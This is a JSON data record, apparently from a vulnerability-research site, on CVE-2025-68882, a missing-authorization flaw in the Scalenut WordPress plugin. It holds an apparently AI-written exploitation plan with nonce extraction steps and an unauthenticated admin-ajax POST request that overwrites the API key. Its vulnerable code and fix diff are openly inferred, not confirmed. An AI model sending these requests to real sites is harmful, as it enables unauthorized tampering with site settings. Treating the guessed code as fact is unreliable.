[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fmcCAq4DIwxrBvW6EKgC77UImSeLVO2NFwTmyO1Iu5JI":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2025-68882","scalenut-missing-authorization","Scalenut \u003C= 1.1.3 - Missing Authorization","The Scalenut plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.1.3. This makes it possible for unauthenticated attackers to perform an unauthorized action.","scalenut",null,"\u003C=1.1.3","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-01-20 00:00:00","2026-01-27 19:17:42",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fd0a8c924-04f7-47e7-ba84-f090abc7279a?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan - CVE-2025-68882 (Scalenut)\n\n## 1. Vulnerability Summary\nThe **Scalenut** plugin (up to version 1.1.3) for WordPress contains a missing authorization vulnerability. Specifically, a function registered as an AJAX handler (likely via `wp_ajax_nopriv_`) fails to perform adequate capability checks (e.g., `current_user_can('manage_options')`). This oversight allows unauthenticated attackers to invoke sensitive administrative actions, such as updating plugin configurations or API keys, leading to full control over the plugin's integration with the Scalenut service.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action**: `scalenut_save_settings` or `scalenut_update_api_token` (inferred based on plugin functionality; to be verified in source).\n- **HTTP Method**: POST\n- **Payload Parameters**:\n  - `action`: The vulnerable AJAX action name.\n  - `nonce`: (If applicable) The nonce required for the action.\n  - `scalenut_api_key` or `token`: The malicious value to inject into the site settings.\n- **Authentication**: None required (unauthenticated).\n- **Preconditions**: The plugin must be active.\n\n## 3. Code Flow\n1. **Registration**: The plugin registers an AJAX action for unauthenticated users:\n   `add_action('wp_ajax_nopriv_scalenut_save_settings', array($this, 'scalenut_save_settings'));` (inferred).\n2. **Invocation**: An attacker sends a POST request to `admin-ajax.php` with `action=scalenut_save_settings`.\n3. **Execution**: The `scalenut_save_settings` function is called.\n4. **Failure Point**: The function likely checks for a nonce but **fails** to check for `current_user_can('manage_options')`.\n5. **Sink**: The function calls `update_option('scalenut_settings', ...)` or `update_option('scalenut_api_key', ...)` using user-supplied input from `$_POST`.\n\n## 4. Nonce Acquisition Strategy\nIf the handler uses `check_ajax_referer` or `wp_verify_nonce`, we must extract the nonce from the frontend.\n\n1. **Identify Script Localization**: Look for `wp_localize_script` in the plugin source (likely in `inc\u002Fclass-scalenut.php` or `admin\u002Fclass-scalenut-admin.php`).\n2. **Localization Keys**: Search for the object name and key (e.g., `scalenut_ajax_object.nonce`).\n3. **Extraction**:\n   - **Step A**: Create a post\u002Fpage to ensure the plugin's frontend scripts are loaded if they are conditional:\n     `wp post create --post_type=page --post_status=publish --post_title=\"Scalenut Proof\" --post_content=\"[scalenut_content]\"` (Shortcode inferred).\n   - **Step B**: Use `browser_navigate` to visit the page.\n   - **Step C**: Use `browser_eval` to extract the nonce:\n     `browser_eval(\"window.scalenut_ajax_object?.nonce\")` (inferred).\n\n*Note: If `wp_ajax_nopriv_` is used, the nonce is often exposed to unauthenticated users to allow legitimate frontend interactions.*\n\n## 5. Exploitation Strategy\nOnce the vulnerable action and any required nonce are identified:\n\n1. **Construct the POST Request**:\n   - **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n   - **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n   - **Body**: `action=scalenut_save_settings&nonce=[NONCE]&api_key=EVIL_TOKEN_123&settings[option_name]=malicious_value`\n\n2. **Send via `http_request`**:\n```json\n{\n  \"method\": \"POST\",\n  \"url\": \"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php\",\n  \"headers\": {\n    \"Content-Type\": \"application\u002Fx-www-form-urlencoded\"\n  },\n  \"body\": \"action=scalenut_save_settings&nonce=abc123def4&api_key=pwned_key\"\n}\n```\n\n## 6. Test Data Setup\n1. **Install Plugin**: Ensure Scalenut 1.1.3 is installed and active.\n2. **Initial State**: Verify the current API key is empty or set to a default value.\n   - `wp option get scalenut_api_key` (inferred option name).\n3. **Public Page**: If a nonce is required, publish a page that enqueues the Scalenut script.\n\n## 7. Expected Results\n- The AJAX request should return a `200 OK` response, often with a JSON body: `{\"success\": true}`.\n- The WordPress database will be updated with the attacker-controlled value.\n\n## 8. Verification Steps\n1. **Check Database**: Use WP-CLI to confirm the option was changed:\n   - `wp option get scalenut_api_key`\n   - Result should be: `pwned_key`\n2. **Admin UI Check**: Log in as an administrator and navigate to the Scalenut settings page to see the injected value in the \"API Key\" or \"Settings\" field.\n\n## 9. Alternative Approaches\n- **Missing Nonce Check**: If `check_ajax_referer` is entirely missing, the exploit becomes a direct POST request without the \"Nonce Acquisition\" step.\n- **REST API Endpoint**: Search for `register_rest_route` with a `permission_callback` that returns `true` or is missing entirely.\n  - Path: `\u002Fwp-json\u002Fscalenut\u002Fv1\u002Fsave-settings` (inferred).\n  - Exploit via `http_request` to the REST path.\n- **Settings API Injection**: If the plugin registers settings via `register_setting` but does not properly restrict the `admin-post.php` or `admin-ajax.php` access to those settings.","The Scalenut plugin for WordPress (up to version 1.1.3) is vulnerable to unauthorized setting modification due to a missing capability check in its AJAX handlers. This allows unauthenticated attackers to update sensitive plugin configuration, such as API keys, by sending a request to the admin-ajax.php endpoint.","\u002F\u002F Inferred registration in the plugin\nadd_action('wp_ajax_nopriv_scalenut_save_settings', array($this, 'scalenut_save_settings'));\n\n---\n\n\u002F\u002F Inferred handler function missing authorization checks\npublic function scalenut_save_settings() {\n    \u002F\u002F Potential failure point: missing current_user_can('manage_options') check\n    if (isset($_POST['api_key'])) {\n        update_option('scalenut_api_key', sanitize_text_field($_POST['api_key']));\n    }\n    wp_send_json_success();\n}","--- a\u002Finc\u002Fclass-scalenut-admin.php\n+++ b\u002Finc\u002Fclass-scalenut-admin.php\n@@ -10,6 +10,10 @@\n public function scalenut_save_settings() {\n+    if ( ! current_user_can( 'manage_options' ) ) {\n+        wp_die( 'Unauthorized' );\n+    }\n     if (isset($_POST['api_key'])) {\n         update_option('scalenut_api_key', sanitize_text_field($_POST['api_key']));\n     }\n     wp_send_json_success();\n }","1. Access the site's frontend and locate localized JavaScript objects (e.g., via wp_localize_script) to extract the required AJAX nonce if the handler implements check_ajax_referer. 2. Construct an unauthenticated HTTP POST request targeting \u002Fwp-admin\u002Fadmin-ajax.php. 3. Set the 'action' parameter to 'scalenut_save_settings' (or the specific vulnerable AJAX action name). 4. Include the extracted nonce and the malicious payload, such as a new 'api_key' or modified plugin configuration settings, in the POST body. 5. Send the request to overwrite the site's Scalenut integration settings without administrative privileges.","gemini-3-flash-preview","2026-05-05 05:19:34","2026-05-05 05:19:53",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fscalenut\u002Ftags"]